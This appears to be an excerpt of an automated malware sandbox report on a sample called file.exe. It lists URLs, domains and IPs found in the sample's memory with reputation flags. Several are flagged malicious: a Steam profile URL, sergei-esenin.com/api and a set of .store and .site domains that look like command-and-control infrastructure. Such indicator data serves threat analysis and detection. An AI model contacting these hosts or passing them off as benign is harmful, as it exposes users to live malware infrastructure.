    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://steam.tv/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://lv.queniujq.cn0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://checkout.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://store.steampowered.com/;0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://recaptcha.net/recaptcha/;0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://medal.tv0%URL Reputationsafe
    https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://login.steampowered.com/0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    https://recaptcha.net0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/0%URL Reputationsafe
    https://api.steampowered.com/0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl0%URL Reputationsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    104.102.49.254
    truetrue
      unknown
      sergei-esenin.com
      104.21.53.8
      truetrue
        unknown
        eaglepawnoy.store
        unknown
        unknowntrue
          unknown
          bathdoomgaz.store
          unknown
          unknowntrue
            unknown
            spirittunek.store
            unknown
            unknowntrue
              unknown
              licendfilteo.site
              unknown
              unknowntrue
                unknown
                studennotediw.store
                unknown
                unknowntrue
                  unknown
                  mobbipenju.store
                  unknown
                  unknowntrue
                    unknown
                    clearancek.site
                    unknown
                    unknowntrue
                      unknown
                      dissapoiznw.store
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        studennotediw.storetrue
                          unknown
                          dissapoiznw.storetrue
                            unknown
                            https://steamcommunity.com/profiles/76561199724331900true
                            • URL Reputation: malware
                            unknown
                            eaglepawnoy.storetrue
                              unknown
                              bathdoomgaz.storetrue
                                unknown
                                clearancek.sitetrue
                                  unknown
                                  spirittunek.storetrue
                                    unknown
                                    licendfilteo.sitetrue
                                      unknown
                                      mobbipenju.storetrue
                                        unknown
                                        https://sergei-esenin.com/apitrue
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://www.cloudflare.com/learning/access-management/phishing-attack/file.exe, 00000001.00000003.1301918029.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://player.vimeo.comfile.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://sergei-esenin.com/file.exe, 00000001.00000002.1594572320.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1312496413.0000000000FC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://store.steampowered.com/subscriber_agreement/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://www.gstatic.cn/recaptcha/file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://store.steampowered.comfile.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://www.valvesoftware.com/legal.htmfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.youtube.comfile.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.google.comfile.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPifile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://s.ytimg.com;file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://steam.tv/file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://store.steampowerfile.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://store.steampowered.com/privacy_agreement/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://store.steampowered.com/points/shop/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://sketchfab.comfile.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://lv.queniujq.cnfile.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • URL Reputation: malware
                                                                unknown
                                                                https://www.youtube.com/file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://store.steampowered.com/privacy_agreement/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://www.cloudflare.com/5xx-error-landingfile.exe, 00000001.00000003.1301918029.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&afile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.google.com/recaptcha/file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://checkout.steampowered.com/file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://avatars.akamai.steamstaticS3file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://store.steampowered.com/;file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://store.steampowered.com/about/file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://steamcommunity.com/my/wishlist/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://sergei-esenin.com/apikfile.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://help.steampowered.com/en/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://steamcommunity.com/market/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://store.steampowered.com/news/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://community.akamai.steamstatic.com/file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://store.steampowered.com/subscriber_agreement/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://recaptcha.net/recaptcha/;file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://steamcommunity.com/discussions/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://store.steampowered.com/stats/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://medal.tvfile.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://broadcast.st.dl.eccdnx.comfile.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://store.steampowered.com/steam_refunds/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://sergei-esenin.com/api2file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=efile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://steamcommunity.com/workshop/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://login.steampowered.com/file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://store.steampowered.com/legal/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
